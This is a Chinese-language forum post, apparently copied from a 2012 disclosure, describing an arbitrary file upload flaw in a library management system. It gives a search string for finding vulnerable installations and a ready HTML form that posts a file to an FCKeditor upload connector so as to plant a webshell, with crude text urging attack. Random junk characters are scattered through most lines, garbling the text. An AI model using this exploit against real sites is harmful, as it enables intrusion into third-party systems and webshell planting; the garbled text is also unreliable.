主题:图书馆系统任意文件上传漏洞
! B+ L3 r+ l8 k' U' K2 S9 c 作者:冰锋刺客
9 s0 R% R/ c5 Q1 E- M- @ 厂商:点击书(dianjishu.com)
% Z! \/ ~+ i8 z4 j: S3 m3 @! [& a" F 日期:2012-6-211 i6 |* R( t8 Z) }
! @8 Q3 {, k( _; i3 uI 概述
. G; \6 i% U1 Z( c: U 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
/ u7 t/ F) h% D8 ~. D II 简介) a( O+ ~" A+ |1 E5 p$ F. X
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"9 q8 H8 P- Q! h3 K! |0 r4 H
补充一个漏洞9 _- l. Z; V, x- ]
<form id="frmUpload" enctype="multipart/form-data"
; U, p3 d7 `4 B, f action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>: |: u7 j9 A# g1 Q; T) z1 Q5 k
<input id="btnUpload" type="submit" value="操翻他">
. H, R- _- S u& Q& n% H9 Y3 y6 F. f8 [ </form>. `0 ^8 ]4 v7 j6 o9 B9 y# ^7 d0 d
你们懂的
) {0 o, k% ?; v. L4 @ 那傻逼提供还需要改包.
2 b& Y7 o# q" E 自己看了下源代码发现fckeditor
( M$ J" {1 x7 v y% I/ A" D# N 直接秒杀, x. H0 ]/ R; Y0 _
|
发表于 2012-9-10 21:20:59
收藏
支持
反对